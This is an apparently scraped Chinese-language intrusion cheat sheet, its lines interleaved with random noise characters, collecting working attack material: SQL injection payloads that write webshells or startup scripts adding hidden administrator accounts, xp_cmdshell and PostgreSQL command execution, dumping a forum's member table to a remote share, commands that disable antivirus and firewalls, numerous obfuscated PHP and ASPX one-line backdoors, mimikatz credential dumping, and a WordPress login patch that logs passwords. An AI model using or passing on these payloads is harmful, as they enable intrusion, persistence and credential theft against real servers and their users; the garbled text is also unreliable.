/ C/ I& H, ]  S% A4 |
7 z$ n( }1 Z8 y中文版本操作系统中针对mysql添加用户完整代码:! O6 o$ J: Z: A8 }3 u! B1 m7 X. ]

# }! D& b/ K' k6 K# [0 Suse test;9 K' [  C) L5 H
create table a (cmd text);" t2 x' }) f) W' K6 V" O  v1 z
insert into a values ("set wshshell=createobject (""wscript.shell"") " );* w4 K$ b1 d" [+ |) o( s
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );( m8 @& |3 c& M5 ]
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
9 A! ~' ]. E! u* xselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";: ]- ]) [$ N$ }: U( y% J- Q8 ^
drop table a;: |; r* s" a8 s5 f8 A2 A
- n, y3 X3 y8 E1 q# {8 v; N
英文版本:+ z2 n' B  e8 Q, p
+ [) U6 \0 z" d3 @- x
use test;
8 l' K' u' Y7 R/ |# ]' e4 bcreate table a (cmd text);' w9 f4 g5 H5 p3 b3 s
insert into a values ("set wshshell=createobject (""wscript.shell"") " );! ?4 Z6 C9 t. x
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
$ P6 x+ g, F+ {; ^insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
4 ~0 m: n; k& }! G4 w* S3 wselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";$ @! X& m( ^6 L" p! x
drop table a;
5 M& D! q6 P# T8 }, z( D- v
+ y2 {) G+ K+ S# M) {# O- W6 Wcreate table a (cmd BLOB);
4 `" A# o  [3 o: I( ~! pinsert into a values (CONVERT(木马的16进制代码,CHAR));
. J1 [8 B0 }6 c" h4 |8 Cselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
  `8 j5 h, [% f; G+ }8 Zdrop table a;
% [  E" ?+ d9 _) r; l" R5 ~" G2 l6 K+ z; O( P( ^: v+ U
记录一下怎么处理变态诺顿; s% v) s; w( y( E) I5 n
查看诺顿服务的路径$ Y3 Q2 P# Q$ U% |
sc qc ccSetMgr
- A8 o6 Z/ f+ o* E1 m" k然后设置权限拒绝访问。做绝一点。。( p+ q0 s  q, D# Y# L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
3 r0 }" l0 Z- C$ B3 |cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
7 T- t5 B/ k9 v" ~cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
5 J. ~/ u: _/ z/ e. Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone, z: _" o. _, j* P- t
" q6 t) ]$ y- t4 U- `1 b1 U8 X
然后再重启服务器. K& j4 G- k, z, w; }
iisreset /reboot& Q3 ]1 A+ S8 j
这样就搞定了。。不过完事后。记得恢复权限。。。。
# C. e: L1 _$ \/ I; |* Jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F7 M+ E' p$ C4 P/ p7 Z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F9 R# \/ y# ~. M; u% P  G
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
& }. A0 s9 P; g) y& @4 S) l, ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
+ c+ M) f, ~" p, Q5 U  E2 G! _6 OSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin' I) P# L& c! m; Y$ C) H! {9 A4 J

5 S9 _7 G) b0 l0 w- r( rEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
3 K) k7 l/ M5 E
, k) x$ b( P6 u9 W5 Z& ~( npostgresql注射的一些东西
/ d- a! n; K% e4 {4 h3 P7 H* M# \如何获得webshell
8 h8 a+ I5 f/ \, `http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
9 G1 j' f1 s$ {+ _* a0 Hhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); % _: f3 w! k# f
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;$ X) J: L  i* V: ~4 ~1 ^
如何读文件7 M7 z; M' i/ S9 }3 ^
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
  C; H$ J# K) @- A3 D: |- ?& u( N2 \http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;, h0 {  u$ {, i- N( j& I
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
+ d0 y  y# u$ {8 `
5 x) o- X8 ~: N2 Dz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。1 F8 {+ T. N/ H! w0 E
当然,这些的postgresql的数据库版本必须大于8.X
6 }% o9 t; H+ |" O6 b1 G创建一个system的函数:
7 H8 f" y7 j( cCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT1 H4 @1 w4 @; e, A

# O2 `6 e$ P, r+ O# D创建一个输出表:
# L6 j3 q6 g% r6 \CREATE TABLE stdout(id serial, system_out text)
" m" M5 i0 |6 c( a0 A# y! c, w3 N, j' k1 X% d4 l
执行shell,输出到输出表内:9 L- }0 J- _7 h% |0 W
SELECT system('uname -a > /tmp/test')
: S2 M/ c8 |* |+ H1 q: Z7 V
7 U4 K) z, k* Ucopy 输出的内容到表里面;
6 Z, Y0 z6 V' B( T$ D% Q( BCOPY stdout(system_out) FROM '/tmp/test'
+ J' A# L( A1 n  V) w+ g5 p0 e0 Y7 a: b8 D: k9 z  i0 Q! J
从输出表内读取执行后的回显,判断是否执行成功
/ S" I7 c) t3 y' Y' P! F
' T7 W# w( y& m  l7 i0 eSELECT system_out FROM stdout/ e, S7 G7 t" S0 U. D
下面是测试例子* V/ ^( m5 ^4 L3 ~- Z+ n
- K% i: ~! B( n" y, L7 Y' m
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
9 v3 X8 X2 h) v  M) ]  H' n1 R  q$ q  \# T2 U: m* {4 x
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'5 B! o$ K  I6 K/ ^9 `! G# X( r
STRICT --% N* ^1 n1 L: a' S& U

( [& Q8 g  Y* W) K; o7 t* P/store.php?id=1; SELECT system('uname -a > /tmp/test') --
7 ^; z9 m& G4 F  D# `/ F" Z# h- m+ R% W! E1 y6 n/ j
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --% r. u$ l) M3 x6 ]# \  L

# S0 c, y7 u- g/ v! I/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--$ v4 O6 A/ _# d: i/ H
net stop sharedaccess    stop the default firewall
, S* }7 H4 g! Z! X, d3 b' u, t/ V* X5 K+ Fnetsh firewall show      show/config default firewall  ]6 V7 }1 p' ~4 y
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
/ s9 c, c  t6 `! anetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
& d6 ?  S5 L1 n, r* O4 @2 S修改3389端口方法(修改后不易被扫出)+ q3 V! o1 A* P& p- U$ T- N4 L5 g9 o
修改服务器端的端口设置,注册表有2个地方需要修改
) g6 H5 I2 p. j/ m9 F, g& ]5 x8 K: R+ l# k+ r: _, K# P
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]: y0 ?! A2 Y. P/ C
PortNumber值,默认是3389,修改成所希望的端口,比如6000
  [) Y# Z" e% g% p2 w$ Z# A/ r( I4 e
第二个地方:
6 T# v, ]- \- n0 Z" u[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
' w' s6 v+ `) pPortNumber值,默认是3389,修改成所希望的端口,比如6000
8 K0 Q( }/ }  D1 X# l5 }/ a% R1 e  S. v- A4 s3 n+ E. V9 X
现在这样就可以了。重启系统就可以了  F% d( K4 _0 }6 o) L4 ?

8 B& o1 N6 Y2 Q# Y, m- }2 e' {查看3389远程登录的脚本
6 ?! Y7 z9 P  b% d3 w保存为一个bat文件
2 q+ c4 k- w+ Y9 Q8 H  idate /t >>D:\sec\TSlog\ts.log9 J4 s0 |, k4 K; k2 f
time /t >>D:\sec\TSlog\ts.log7 h! Y2 z1 w. ?. x8 F; I6 ^
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
+ k/ M6 V9 g& A5 M3 `start Explorer
) G# ]8 U" ~; Y4 l+ Y* a. Q) J# \0 K& P4 E1 x6 M: i. t
mstsc的参数:
' X8 n; t; e" ~7 L; c0 \5 _
9 X" ~# ]; @" b: {6 Z远程桌面连接
4 P; I/ N/ {9 {+ f& Y! |
2 s! B" z; D3 K7 j; y0 uMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]) [. J# K! F6 `. z
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
1 N, J3 a& r; S; R8 E# K% o9 q& M# f% x* b" ~& }
<Connection File> -- 指定连接的 .rdp 文件的名称。# E, ^: r8 g* y3 P
) L  {0 @' r7 V. Z3 T
/v:<server[:port]> -- 指定要连接到的终端服务器。
+ d2 ]9 l+ _# E% f4 r
& V0 N1 z2 B; Z6 u: R6 F/console -- 连接到服务器的控制台会话。
* c& X8 U/ f1 A* a+ Y% ?: n  A$ Y; p
/f -- 以全屏模式启动客户端。
2 p; |' G4 ~2 O/ \! H- p* z8 X  e2 K! [3 q8 \5 \$ N5 D: t" l. |& \
/w:<width> --  指定远程桌面屏幕的宽度。6 y6 t. W, v7 t- `, l; p0 N( T

( |. s, ]1 |8 f6 C/h:<height> -- 指定远程桌面屏幕的高度。( {0 L8 ~4 U5 ~

3 |0 P7 e' h: e/ f3 b/ S/edit -- 打开指定的 .rdp 文件来编辑。
( |6 t8 o( y: x3 _' s- q' D9 t$ O5 I1 [
/migrate -- 将客户端连接管理器创建的旧版5 E3 \) E# i7 K) E' q5 s  @& Z1 T
连接文件迁移到新的 .rdp 连接文件。; d1 {* v1 N5 v" v& d4 F
6 t9 J1 W) E) Z. I1 z7 k6 ?

3 d' w$ m, ?6 w2 A# a! `' P其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就- \0 w; l; h$ p$ f9 f5 e/ S
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量, X1 _$ a$ k& Z8 k  ~( X0 p

# P+ E; i8 i. ~' b+ G4 B' `8 U( ^命令行下开启3389
: n. i$ Z- C, }: l8 [net user asp.net aspnet /add
8 M$ ~1 }8 j% |) N5 A- Mnet localgroup Administrators asp.net /add
& W. B5 s/ r; K0 U- q% r, wnet localgroup "Remote Desktop Users" asp.net /add
0 }4 W" \8 t  u7 @8 {- u/ ^1 k+ C  \attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
6 l8 n' V; l( w* {echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0/ A! n; i3 v7 U1 V* @! _) G0 y
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
% M& p' u, G. r, wecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
' P' k9 j- Y; P$ B* f# e/ Isc config rasman start= auto$ b! }& j% g' p& C! T9 ?+ y  z# ?
sc config remoteaccess start= auto  C# ~9 B" U' j! j
net start rasman
! x7 z6 v( T# f$ _# E$ n8 K6 z/ Gnet start remoteaccess" i2 u9 N" v  l! e/ p. M7 s
Media1 m& b8 X/ L, |, z& u
<form id="frmUpload" enctype="multipart/form-data"2 P; D( R4 ?( L- d
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
+ K( I; n, W3 ~7 d% b& [<input type="file" name="NewFile" size="50"><br>& K, l0 w" r9 U1 H& K
<input id="btnUpload" type="submit" value="Upload">
0 S4 h% b& C: K3 x</form>
. b4 p* A: T0 [
6 O3 f( A$ x/ l" fcontrol userpasswords2 查看用户的密码: m' [( ?9 r4 m& n9 y$ Z
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径. i( ?3 C8 o- t/ T
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a5 g+ Z: Y6 Z8 W5 P. Z; x' q

& s* f' ^1 N' a9 q141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
! Q" u, }) r! W" S- R7 R1 m& {测试1:& K6 b, K$ B; e' c: l5 j  K
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1! @7 M  Z( R; E$ w8 |

6 W  @5 ?- }5 l测试2:! N' J4 P- |; r
' p8 {& j1 @1 ~
create table dirs(paths varchar(100),paths1 varchar(100), id int)
. @  h( \6 z+ ~' A) N8 u6 n: [% C- L# l' J
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
0 B' T- ]6 [5 R4 z$ E. \
2 d. R6 o0 n1 TSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t16 Z& r2 H7 f* I9 s0 H% Q
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令( F. K+ Y+ X: F' u
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;3 W9 O# f( D" u0 `* S' m
net stop mcafeeframework: b8 J- F! L* d. m/ G
net stop mcshield
: l  Q9 }$ b5 z- |net stop mcafeeengineservice. N2 L. \! T( w# `8 i
net stop mctaskmanager$ O& {, [2 D/ B0 r+ @
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
1 y) a, f6 a7 v3 h. a2 n4 l
5 f/ G/ j  {7 H4 T$ x4 }! ]  VNCDump.zip (4.76 KB, 下载次数: 1) . j! B7 @8 X7 @$ ]
密码在线破解http://tools88.com/safe/vnc.php( L$ o* b% S- m1 Y5 Q
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
  f! a" F% Z' F% e( w: l6 k) [
% ^) ]: k* [8 l% W7 Kexec master..xp_cmdshell 'net user'9 B  r5 b* e# y: U) l
mssql执行命令。
" N2 p, e# J# S9 O- u4 e获取mssql的密码hash查询: C( @+ U9 ^8 s/ Q+ b3 T' r
select name,password from master.dbo.sysxlogins9 D! p" u# {  @
$ L1 \) M1 b, ~2 ~9 X% Z
backup log dbName with NO_LOG;6 Y& T4 l6 R; n( M
backup log dbName with TRUNCATE_ONLY;: Z- V' U/ Z  |4 ]$ ^2 G) e
DBCC SHRINKDATABASE(dbName);6 u% c) S( v6 U4 M; i1 x9 j
mssql数据库压缩/ G& a" ]' E+ q, a

0 @) f: J% t, q. {( @$ n0 m% VRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK  c7 {6 c6 T. W# @8 ^! M. T" ?
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
' y1 {: ^7 y# W
( A2 D! P, \4 b' H2 kbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'" o4 H9 \7 ^5 |( o9 H# r0 j
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak3 C6 q7 \$ W6 [7 a! f0 @# }
7 D  k9 r* R9 }
Discuz!nt35渗透要点:
, D+ m# Q5 L8 R  {' r(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
- `, A2 B- ~, Q1 n(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
$ |2 W6 M* `5 Z! A: Z(3)保存。
9 p! ~5 t. v. {) B(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass9 [* q$ v% B* s; {! _4 p1 B$ k; h
d:\rar.exe a -r d:\1.rar d:\website\
' C; ]6 ?( v5 t1 P1 p5 E! x, g: v递归压缩website
  ]$ F8 B- q$ X2 B7 o注意rar.exe的路径/ n' g+ ?: H0 Z/ k, Q
2 y$ i' {1 Z1 i" s- I
<?php
' b; F, T1 z8 r3 p$ c" R% p( x- Y! D1 U% T3 o5 S# i. b
$telok   = "0${@eval($_POST[xxoo])}";
$ c) K4 Y6 m0 n* \( i4 K5 Z
: r1 Z' Z' U; c$username   = "123456";
; `# H' K% ?0 W+ T3 p$ t- k" T
$userpwd   = "123456";0 I: A& Q3 h3 T/ }3 I
+ Z  R9 u. R; B+ a
$telhao   = "123456";1 _. R) A. J* v# _

. I$ p" t7 B! H& F: r2 S7 u0 ]$telinfo   = "123456";! \: e! n2 v/ Z! a8 y: [

# x1 m/ O  c% W( `6 T?>0 S% G% m4 D" W7 h
php一句话未过滤插入一句话木马
1 n, {9 Q3 x. N3 k9 b6 z3 c/ Z# _9 e, Q& V7 C9 i/ d& I
站库分离脱裤技巧" T& H6 {, h; V" D$ e
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'# N: _  s7 ]$ r
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'+ g, r. _9 Q% I
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。" q+ H/ {) G3 |$ k
这儿利用的是马儿的专家模式(自己写代码)。& y, e3 |) p( f. @; D
ini_set('display_errors', 1);
% |# w8 c  r9 s4 u- v- r0 [set_time_limit(0);# g! a# ?1 e7 w3 z4 y+ K
error_reporting(E_ALL);5 _0 f4 ?0 f" _" U
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());% r1 \; Q3 L4 F) S6 n; W: _- y
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());' {' l% ]! M4 R& G- c
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());7 D3 l8 t9 t& k
$i = 0;# ~3 r; Q0 }* ]* ~: z
$tmp = '';- i! B# r8 j5 G, T
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+ ^/ O  q  @+ J2 @/ Z    $i = $i+1;" R  G* g+ h0 u) _* f  {' n) n
    $tmp .=  implode("::", $row)."\n";0 e5 C# @+ ]3 K$ V
    if(!($i%500)){//500条写入一个文件0 \0 S0 c9 y! B* ]7 D
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';& o0 m1 a1 b  \: P  {
        file_put_contents($filename,$tmp);
6 B& ^7 m8 f. U        $tmp = '';; ^6 v# N' `3 V% P' w
    }
5 M$ a* U$ w8 S9 }( ]$ _2 ^9 ^' d}
/ p8 l) C6 l6 W  J$ Nmysql_free_result($result);$ x9 {; _' B  O

$ t; W; t3 C8 D  Z0 Y  x+ [$ w1 i, S! K8 O+ E: D/ X1 {

" r! u3 u4 J5 e1 C# z. d//down完后delete
: O3 C- u, T, i. @! E3 L0 T
8 J" |/ X& b" q% V! X; Z3 I$ L5 }% k0 D! a' J( F
ini_set('display_errors', 1);  p& }' f5 U0 H" h, U5 r, b; l
error_reporting(E_ALL);! a/ s+ N4 R% l. G% D6 H9 {
$i = 0;7 I6 I" @" W- q7 M. i
while($i<32) {2 s; J5 n! a& Y( m2 {- N0 @
    $i = $i+1;+ w0 W+ C$ M: c2 b& [# a1 m
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
2 A: ~  ~/ c. y4 }3 L* B        unlink($filename);2 I* v- N, @: Y8 }* Y4 ~
}
. m3 l! `. h' i  @+ s5 M6 b0 s) _, Khttprint 收集操作系统指纹
$ P! b9 i* C3 v: s2 ^扫描192.168.1.100的所有端口7 t& J$ t/ _* E/ E* g) D
nmap –PN –sT –sV –p0-65535 192.168.1.100: q' j; E  h& x" x
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
: {3 a6 K* L6 m5 shost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
! C" m; R0 u) _8 [- m$ cNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host1 I4 w# r# h5 G& K/ x8 G5 P) F
- a6 I6 R  J  I& k$ x$ t
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
2 S: R* R+ [" t% I4 F
4 \! P/ D. }/ a+ r4 f6 H  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)5 P% n+ G$ Q: y% x! q

, d; S2 ^: j+ H* a7 e  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
! z- F2 S' C  L# Q* i* _7 c8 k, G- u" b& v) v& {2 @) {5 F1 |
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
/ w) f  x( P8 ]0 w0 Q4 p7 V
5 ?7 d5 R- t- u- T. z. k1 @: i  http://net-square.com/msnpawn/index.shtml (要求安装)) W' w% @, m4 k9 r0 u0 E5 m

" Y9 k% S7 Q$ P  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的); \9 j. K5 ?' |- s7 k4 {$ [
; D$ \6 W/ |$ i6 J! u! G+ r
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
2 L. R) W% e- w, Y. B: _( ^1 ?set names gb2312
$ v4 D0 m3 ?& \  `5 Z导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。: M$ P) z# i& V2 \

' b7 A0 h) a9 h0 U! qmysql 密码修改
  P& i5 A- R, j2 c' wUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” ; s6 I. U9 W* h$ o% c
update user set password=PASSWORD('antian365.com') where user='root';
" b! y- M4 b& D# }flush privileges;# y! T4 b3 V* n  U! b5 Z$ _0 n
高级的PHP一句话木马后门
& b& f) s5 A, @; u& c: J1 q3 i/ Q# @( W5 P: Z6 x! R% ]- O( ]
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
- [9 a2 ^1 `& _8 F+ U
3 V* A. b; G' y3 t3 B# `1、
  t" m0 I2 k6 H8 W! y+ S: X
8 R! M# p5 g2 Q4 b0 O$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";7 u4 n3 f$ D8 s& t; o) u( t0 U

4 w/ }- l" F; M$ r& Y* n$hh("/[discuz]/e",$_POST['h'],"Access");
, P% c8 ^+ E# t$ O0 D! `! y: B# y# O
//菜刀一句话/ j; @0 }* N/ ^2 ]% s8 ~, ~

6 [6 {; u, [7 E& K' c, D$ {  O4 ?1 a' U2、
4 q; d4 O; L  k- ]. r4 b) r" c; P* W
$filename=$_GET['xbid'];
8 k3 }2 e8 u7 f8 g/ J' F4 F. o! T7 ^2 p9 t
include ($filename);) t! Q6 j; e: z
, |+ Z- M# @  h) R1 O: N3 ?7 S
//危险的include函数,直接编译任何文件为php格式运行/ U! i' p2 a8 h8 S! \& z' j

# a0 X* U" [3 m$ `0 v4 \3、# ~& v) w! a. L- V0 X+ u% y* h% `

5 W: C) Y1 _5 u) D" K4 ^$reg="c"."o"."p"."y";7 n( \; m, l+ X
" Y5 I+ c' v; h! G& [
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
' u" h6 t  ?  q3 J4 }! G; R" k0 o% d5 t4 V" \& q
//重命名任何文件0 ]! k' a& v* t. @9 t

/ ^' D# r4 @$ ^* L" A+ e- n4、
; V5 V# D# K+ l! k. j0 i: h& s- D* u; n# u, h# b4 \: D
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";6 r% ?2 c: S+ y  K; |

1 |0 d* w1 `, q6 t$gzid("/[discuz]/e",$_POST['h'],"Access");
2 h1 I; Y3 [; W  u- u/ h5 W3 r, `. l7 V& V6 p
//菜刀一句话
( \  R. S: `1 H9 b  x! c+ v7 `- N; B
5、include ($uid);# K  [! F$ S7 |' Z7 }

4 ?" J4 f9 }* Q  N//危险的include函数,直接编译任何文件为php格式运行,POST 8 F) |$ r  G( C9 ?" F: _: ]* t
" D! c7 R/ T: M* n/ r9 T
1 n, A4 g6 |. H
//gif插一句话
) J3 |& h! p, v$ ?% `/ Z
2 L: s) T, r$ m. R* Y" A  ~6、典型一句话
- k# |; r: [0 i
0 |  P* x: x$ B- I/ \. f程序后门代码
2 ~# O; V5 E3 E$ Q<?php eval_r($_POST[sb])?>$ t% c! q6 V# P& d& b
程序代码
% D+ i# n5 `6 i5 L5 B4 |# @6 n/ a<?php @eval_r($_POST[sb])?>6 S2 j! Y( j5 R0 a7 {; a9 r0 y# l
//容错代码
. S( D/ ?5 Y- a4 T# Y程序代码+ P$ P; Z2 y9 b( g
<?php assert($_POST[sb]);?>9 t: j& c1 `0 B: M( ?( ?" n; [
//使用lanker一句话客户端的专家模式执行相关的php语句# U( O6 g3 t* ~3 J$ p+ o& ^+ B
程序代码
, r2 m  {/ x+ z/ v* l0 \8 N<?$_POST['sa']($_POST['sb']);?>' D( H! D4 P+ B& E) i3 z5 O+ B
程序代码
' G9 R3 @8 R, `<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>+ y- V. e6 S& ~. ~& |; o
程序代码
3 {& W2 X( w7 k) k3 J, S# f4 n; m- ]7 V<?php( c% y" q3 X" t% O& E# z: f
@preg_replace("/[email]/e",$_POST['h'],"error");
) b( z6 t2 M1 s! q" x( p?>- u0 v$ \" ^& M6 Y
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入1 @& l* p8 R5 j/ s1 }, r
程序代码
3 f" a* @9 y1 K! ~8 M<O>h=@eval_r($_POST[c]);</O>
& p# q, v& P* r# F! ^; q1 G程序代码) H% }) ^0 G4 m  n
<script language="php">@eval_r($_POST[sb])</script>: C4 V; E& p- @& t6 P1 j# ?
//绕过<?限制的一句话
/ J: A; [  [' M9 `. [# J  p
/ M" c3 ~: F/ c5 P2 b$ M8 whttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
! W9 M  u1 D  h详细用法:; ]- Q3 g6 m# t( |. j/ K. E% _
1、到tools目录。psexec \\127.0.0.1 cmd
+ e" Y: P* k5 H2 F% B: ?, f. _' f2、执行mimikatz
8 c' y4 e6 G& h) y! \2 d3、执行 privilege::debug: c3 a% A6 i+ ?$ \5 m
4、执行 inject::process lsass.exe sekurlsa.dll0 @( _$ U; q& s5 K6 Z% A: x3 Y3 J
5、执行@getLogonPasswords
5 Y" W/ O, |. `, q6、widget就是密码5 [/ e- E) _0 ^
7、exit退出,不要直接关闭否则系统会崩溃。# B- u% V) Q0 e- Z5 n

1 i1 v+ r. g0 S7 e9 b# rhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
' P- G0 q9 |' a9 f. F' d9 g; I. B" H" q: ~
自动查找系统高危补丁
8 Q$ K" P  U. {# j# Dsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
6 I. o/ V5 R$ Y* {2 G
  l9 r& P# D2 ~2 \8 ?! L突破安全狗的一句话aspx后门$ Y. a' Y  r" B+ r  |
<%@ Page Language="C#" ValidateRequest="false" %>
# w, _2 n$ k, F<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>- j: O% Q/ u) G
webshell下记录WordPress登陆密码9 Q; H/ Q* S4 P/ g( H  E
webshell下记录Wordpress登陆密码方便进一步社工
9 s" m9 @& U2 ?8 A$ |# h8 U) [在文件wp-login.php中539行处添加:2 w/ X" A/ o. o  j6 o. z6 P
// log password& C; n0 q! L$ _* V! h
$log_user=$_POST['log'];$ z. J' }) M& O0 b; d
$log_pwd=$_POST['pwd'];
4 ~! y+ n. t$ B1 M0 I/ Y: Q$log_ip=$_SERVER["REMOTE_ADDR"];
) J* I  G; }- a2 n$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
& `3 c3 P' I! q- v& Z( j$txt=$txt.”\r\n”;# o) u7 T/ Y, A9 r6 J2 q1 |
if($log_user&&$log_pwd&&$log_ip){
; D. {: |" I+ c2 A! K/ Y6 [@fwrite(fopen(‘pwd.txt’,”a+”),$txt);+ c& U9 V2 Q9 l! K
}4 H$ I2 T1 J+ u; d* j
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。$ l; r0 S0 s1 M
就是搜索case ‘login’
